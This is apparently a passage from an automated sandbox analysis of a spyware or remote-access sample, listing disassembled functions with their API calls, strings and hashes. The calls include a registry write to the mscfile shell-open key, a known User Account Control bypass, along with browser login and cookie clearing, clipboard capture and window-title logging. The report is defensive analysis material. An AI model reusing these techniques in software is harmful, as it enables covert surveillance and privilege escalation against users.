                                Function 00412006 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                Strings
                                • http\shell\open\command, xrefs: 00412026
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: http\shell\open\command
                                • API String ID: 3677997916-1487954565
                                • Opcode ID: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                                • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                                • Opcode Fuzzy Hash: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                                • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                                Function 00412204 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046FB08), ref: 0041220F
                                • RegSetValueExW.ADVAPI32(0046FB08,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,0046FB08), ref: 0041223E
                                • RegCloseKey.ADVAPI32(0046FB08,?,80000001,?,0040674F,00469654,0046FB08), ref: 00412249
                                Strings
                                • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: Software\Classes\mscfile\shell\open\command
                                • API String ID: 1818849710-505396733
                                • Opcode ID: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                                • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                                • Opcode Fuzzy Hash: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                                • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
                                Function 0040C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                                  • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                                  • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                • String ID: bad locale name
                                • API String ID: 3628047217-1405518554
                                • Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                                • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                                • Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                                • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                                Function 00412268 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateValue
                                • String ID: P0F
                                • API String ID: 1818849710-3540264436
                                • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                                • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                                Function 00401497 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                                • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: GetLastInputInfo$User32.dll
                                • API String ID: 2574300362-1519888992
                                • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
                                • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
                                Function 00448C13 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID:
                                • API String ID: 1036877536-0
                                • Opcode ID: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                                • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
                                • Opcode Fuzzy Hash: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                                • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
                                Function 0043FD01 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
                                • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
                                Function 00404CA3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
                                • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                                • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                • String ID:
                                • API String ID: 3360349984-0
                                • Opcode ID: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
                                • Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
                                • Opcode Fuzzy Hash: 4507b0ab51a6c89f5a00a7e6d16978d5bd04c0451300ea21d68f1003f035869f
                                • Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666
                                Function 0040AF4D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • [Cleared browsers logins and cookies.], xrefs: 0040B025
                                • Cleared browsers logins and cookies., xrefs: 0040B036
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                • API String ID: 3472027048-1236744412
                                • Opcode ID: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                                • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                                • Opcode Fuzzy Hash: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                                • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                                Function 00411140 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                  • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                  • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQuerySleepValue
                                • String ID: H"G$exepath$!G
                                • API String ID: 4119054056-2148977334
                                • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                                • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                                Function 004094FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                  • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                  • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                • Sleep.KERNEL32(000001F4), ref: 0040955A
                                • Sleep.KERNEL32(00000064), ref: 004095F5
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$ForegroundLength
                                • String ID: [ $ ]
                                • API String ID: 3309952895-93608704
                                • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                                • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                                • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                                • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                                Function 00440F33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
                                • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                                • Opcode Fuzzy Hash: 2970eecc447bf90f09d99781fc54b6e0c8e96c5b6031d191d94caaf8528dc60b
                                • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                                Function 00440FB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
                                • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                                • Opcode Fuzzy Hash: 995436ab4c2709f546f4042a2e75d66bbbd7790162713e0acfb32ec842828db5
                                • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                                Function 0041A20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
                                • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandleReadSize
                                • String ID:
                                • API String ID: 3919263394-0
                                • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                                • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                                Function 00436CD1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                Download Yara Rule
                                APIs
                                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                                  • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                • String ID:
                                • API String ID: 1761009282-0
                                • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                                • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                                Function 0044015D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                Download Yara Rule
                                APIs
                                • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorHandling__start
                                • String ID: pow
                                • API String ID: 3213639722-2276729525
                                • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                                • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                                Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                                  • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                  • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                  • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                                Strings
                                • /sort "Visit Time" /stext ", xrefs: 00404092
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                • String ID: /sort "Visit Time" /stext "
                                • API String ID: 368326130-1573945896
                                • Opcode ID: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                                • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                                • Opcode Fuzzy Hash: a4a6769404a45eb771fb951e36bc417e5ca480f2d31eb92d27795bae4adf2828
                                • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                                Function 0040A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Init_thread_footer__onexit
                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                • API String ID: 1881088180-3686566968
                                • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                                • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                                Function 0044ED17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ACP$OCP
                                • API String ID: 0-711371036
                                • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                                • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                                Function 00415B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                                • IsWindowVisible.USER32(?), ref: 00415B37
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$TextVisible
                                • String ID: (%G
                                • API String ID: 1670992164-3377777310
                                • Opcode ID: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                                • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                                • Opcode Fuzzy Hash: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                                • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                                Function 00404FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                                Strings
                                • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: Connection KeepAlive | Enabled | Timeout:
                                • API String ID: 481472006-507513762
                                • Opcode ID: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                                • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
                                • Opcode Fuzzy Hash: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                                • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
                                Function 00432D4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                                • ___raise_securityfailure.LIBCMT ref: 00432E76
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                • String ID: (F
                                • API String ID: 3761405300-3109638091
                                • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                                • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                                Function 004194DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalTime
                                • String ID: | $%02i:%02i:%02i:%03i
                                • API String ID: 481472006-2430845779
                                • Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                                • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                                • Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                                • Instruction Fuzzy Hash: 68117F315042015AC304FBA5D8518EBB3E8AB94308F500A3FF895A21E2FF3CDA49C65A
                                Function 00418CCD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000E.00000002.1357241018.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_14_2_400000_xASiLfzXONGIW.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: alarm.wav$x(G
                                • API String ID: 1174141254-2413638199
                                • Opcode ID: 26c40b3e06d19070c32931467931773a754d599fffa5f8131170b201d030b6b4
                                • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
